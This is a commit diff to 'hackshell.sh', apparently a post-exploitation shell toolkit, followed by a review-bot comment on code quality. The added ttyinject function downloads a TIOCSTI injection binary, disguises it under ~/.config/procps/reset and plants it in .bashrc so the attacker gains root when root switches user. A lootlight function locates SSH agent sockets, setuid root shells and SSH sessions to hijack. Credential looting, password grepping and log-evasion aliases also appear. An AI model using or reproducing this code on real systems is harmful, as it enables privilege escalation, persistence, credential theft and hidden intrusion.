
Commit 21769b4

committed
ttyinject & common
1 parent ace5dcc commit 21769b4


1 file changed

+94
-9
lines changed


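--- a/tools/hackshell.sh
+++ b/tools/hackshell.sh
@@ -94,7 +94,7 @@ notime() {
 
 [[ $# -le 1 ]] && { echo >&2 "notime <reference file> <cmd> ..."; return 255; }
 [[ ! -e "$ref" ]] && { echo >&2 "File not found: $ref"; return 255; }
-[ $UID -ne 0 ] && { HS_ERR "Need root"; return 255; }
+[ "$UID" -ne 0 ] && { HS_ERR "Need root"; return 255; }
 
 shift 1
 now=$(date -Ins) || return
@@ -113,7 +113,8 @@ notime_cp() {
 local olddir_date
 local dir
 
-[[ -z "$UID" ]] && UID="$(id -u)"
+[ -z "$UID" ] && UID="$(id -u 2>/dev/null)"
+[ -z "$USER" ] && USER="$(id -un 2>/dev/null)"
 [[ ! -f "$src" ]] && { echo >&2 "Not found: $src"; return 255; }
 if [[ -d "$dst" ]]; then
 dir="$dst"
@@ -332,6 +333,27 @@ zapme() {
 exec zapper -f -a"${1:--}" bash -il
 }
 
+# Find writeable dirctory but without displaying sub-folders
+# Usage: wfind /
+# Usage: wfind /etc /var /usr
+wfind() {
+local arr dir
+local IFS
+
+arr=("$@")
+while [[ ${#arr[@]} -gt 0 ]]; do
+dir=${arr[${#arr[@]}-1]}
+unset "arr[${#arr[@]}-1]"
+find "$dir" -maxdepth 1 -type d -writable -ls 2>/dev/null
+IFS=$'\n' arr+=($(find "$dir" -mindepth 1 -maxdepth 1 -type d ! -writable 2>/dev/null))
+done
+}
+
+# Only output the 16 charges before and 32 chars after..
+hgrep() {
+grep -HEronasi ".{,16}${1:-password}.{,32}" .
+}
+
 bin() {
 local arch="$(uname -m)"
 local os="$(uname -s)"
@@ -341,7 +363,10 @@ bin() {
 
 [ -z "$os" ] && os="Linux"
 [ -z "$arch" ] && arch="x86_64"
-[ -n "$single" ] && unset is_showhelp
+[ -n "$single" ] && {
+FORCE=1 # implied. Always download even if systemwide exists
+unset is_showhelp
+}
 a="${arch}"
 
 hs_mkxhome
@@ -457,6 +482,38 @@ _loot_homes() {
 done
 }
 
+lootlight() {
+local str
+ls -al /tmp/ssh-* &>/dev/null && {
+echo -e "${CB}SSH-AGENT${CDY}${CF}"
+find /tmp -name 'agent.*' -ls
+echo -e "${CN}"
+}
+
+[ "$UID" -ne 0 ] && {
+unset str
+str="$(find /var/tmp /tmp -maxdepth 2 -uid 0 -perm /u=s -ls 2>/dev/null)"
+[ -n "$str" ] && {
+echo -e "${CB}B00M-SHELL ${CDY}${CF}"
+echo "${str}"
+echo -en "${CN}"
+echo -e "${CDW}TIP: ${CDC}"'./b00m -p -c "exec python3 -c \"import os;os.setuid(0);os.setgid(0);os.execl('"'"'/bin/bash'"'"', '"'"'-bash'"'"')\""'"${CN}"
+}
+}
+
+unset str
+if command -v pgrep >/dev/null; then
+str="$(pgrep -x 'ssh' -a)"
+elif command -v ps >/dev/null; then
+str="$(ps alx | grep "ssh " | grep -v grep)"
+fi
+[ -n "$str" ] && {
+echo -e "${CB}SSH-Hijack (reptyr)${CDY}${CF}"
+echo "${str}"
+echo -e "${CN}"
+}
+}
+
 # Someone shall implement a sub-set from TeamTNT's tricks (use
 # noseyparker for cpu/time-intesive looting). TeamTNT's infos:
 # https://malware.news/t/cloudy-with-a-chance-of-credentials-aws-targeting-cred-stealer-expands-to-azure-gcp/71346
@@ -512,11 +569,7 @@ loot() {
 _loot_homes "AWS S3" ".boto"
 _loot_homes "NETRC" ".netrc"
 
-ls -al /tmp/ssh-* &>/dev/null && {
-echo -e "${CB}SSH AGENT${CDY}${CF}"
-find /tmp -name 'agent.*' -ls
-echo -e "${CN}"
-}
+lootlight
 }
 
 ws() {
@@ -535,6 +588,29 @@ destruct() {
 export HOME="${_HS_HOME_ORIG}"
 }
 
+ttyinject() {
+local is_mkdir
+ttyinject_clean() {
+[ -e "${_HS_HOME_ORIG}/.config/procps/reset" ] && rm -f "${_HS_HOME_ORIG}/.config/procps/reset"
+[ -n "$is_mkdir" ] && rmdir "${_HS_HOME_ORIG}/.config/procps"
+}
+
+[ "$UID" -eq 0 ] && { HS_ERR "You are already root"; return; }
+[ ! -d "${_HS_HOME_ORIG}/.config/procps" ] && { mkdir -p "${_HS_HOME_ORIG}/.config/procps" || return; is_mkdir=1; }
+
+[ ! -f "${_HS_HOME_ORIG}/.config/procps/reset" ] && {
+dl "https://github.com/hackerschoice/ttyinject/releases/download/v1.1/ttyinject-linux-$(uname -m)" >"${_HS_HOME_ORIG}/.config/procps/reset" || return
+}
+chmod 755 "${_HS_HOME_ORIG}/.config/procps/reset" || { ttyinject_clean; return; }
+
+TTY_TEST=1 "${_HS_HOME_ORIG}/.config/procps/reset" || { ttyinject_clean; HS_WARN "System is not vulnerable to TIOCSTI stuffing."; return; }
+[ -f "${_HS_HOME_ORIG}/.bashrc" ] && ! grep -qFm1 'procps/reset' "${_HS_HOME_ORIG}/.bashrc" 2>/dev/null && {
+echo "$(head -n1 "${_HS_HOME_ORIG}/.bashrc")"$'\n'"~/.config/procps/reset 2>/dev/null"$'\n'"$(tail -n +2 "${_HS_HOME_ORIG}/.bashrc")" >~/.bashrc
+}
+echo -e "Wait for ${CDY}/var/tmp/.socket${CN} to appear and then do:
+${CDC}"'/var/tmp/.socket -p -c "exec python3 -c \"import os;os.setuid(0);os.setgid(0);os.execl('"'"'/bin/bash'"'"', '"'"'-bash'"'"')\""'"${CN}"
+}
+
 hs_exit() {
 cd /tmp || cd /dev/shm || cd /
 [ "${#_hs_bounce_src[@]}" -gt 0 ] && HS_WARN "Bounce still set in iptables. Type ${CDC}unbounce${CN} to stop the forward."
@@ -644,7 +720,7 @@ hs_init_alias() {
 alias cd..='cd ..'
 alias ..='cd ..'
 
-command -v curl >/dev/null && curl --help curl | grep -i proto-default && alias curl="--proto-default https"
+command -v curl >/dev/null && curl --help | grep -i proto-default && alias curl="curl --proto-default https"
 }
 
 hs_init_shell() {
@@ -689,7 +765,10 @@ ${CDC} transfer ~/.ssh ${CDM}Upload a file or directory ${
 ${CDC} shred file ${CDM}Securely delete a file
 ${CDC} notime <file> rm -f foo.dat ${CDM}Execute a command at the <file>'s ctime & mtime
 ${CDC} notime_cp <src> <dst> ${CDM}Copy file. Keep birth-time, ctime, mtime & atime
+${CDC} ttyinject ${CDM}Become root when root switches to ${USER:-this user}
+${CDC} wfind <dir> [<dir> ...] ${CDM}Find writeable directories
 ${CDC} find_subdomain .foobar.com ${CDM}Search files for sub-domain
+${CDC} hgrep <string> ${CDM}Grep for pattern, output for humans ${CN}${CF}[hgrep password]
 ${CDC} crt foobar.com ${CDM}Query crt.sh for all sub-domains
 ${CDC} rdns 1.2.3.4 ${CDM}Reverse DNS from multiple public databases
 ${CDC} scan <port> [<IP or file> ...] ${CDM}TCP Scan a port + IP
@@ -698,15 +777,18 @@ ${CDC} np <directory> ${CDM}Display secrets with NoseyPar
 ${CDC} loot ${CDM}Display common secrets
 ${CDC} ws ${CDM}WhatServer - display server's essentials
 ${CDC} bin ${CDM}Download useful static binaries
+${CDC} lt, lss, psg, lsg, ... ${CDM}Common useful shotcuts
 ${CDC} xhelp ${CDM}This help"
 echo -e "${CN}"
 }
 
 
+
 ### Programm
 hs_init "$0"
 hs_init_alias
 hs_init_shell
+
 xhelp
 
 ### Finishing
@@ -719,6 +801,9 @@ echo -e ">>> Tweaking environment variables to log less ${CN}[${CDG}DONE${CN
 echo -e ">>> Creating aliases to make commands log less ${CN}[${CDG}DONE${CN}]"
 echo -e ">>> ${CG}Setup complete. ${CF}${str}${CN}"
 
+### Check for obvious loots
+lootlight
+
 # unset all functions that are no longer needed.
 unset -f hs_init hs_init_alias hs_init_dl hs_init_shell
 unset BIN str SSH_CONNECTION SSH_CLIENT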
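Review bot: In `wfind`, the `IFS=$'\n' arr+=($(find … ! -writable …))` line expands the command substitution unquoted, so pathname expansion still applies to it: a sub-directory whose name contains `*`, `?` or `[` is matched against the current working directory before it is appended, and a name containing a newline is split into two bogus entries. A NUL-delimited read avoids both and makes the `local IFS` line unnecessary: `while IFS= read -r -d '' sub; do arr+=("$sub"); done < <(find "$dir" -mindepth 1 -maxdepth 1 -type d ! -writable -print0 2>/dev/null)`. `-writable` and `-print0` are GNU find extensions; on a find that lacks them the `2>/dev/null` hides the error and the function silently prints nothing, which deserves a comment such as `# requires GNU find (-writable); other finds fail silently here`. The header comment also misspells "directory" as `dirctory`. In `hgrep`, `$1` is spliced straight into an extended regex, so a string containing `.`, `+` or `(` changes the pattern instead of matching literally; either document in the comment that the argument is an ERE or escape it before interpolation.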
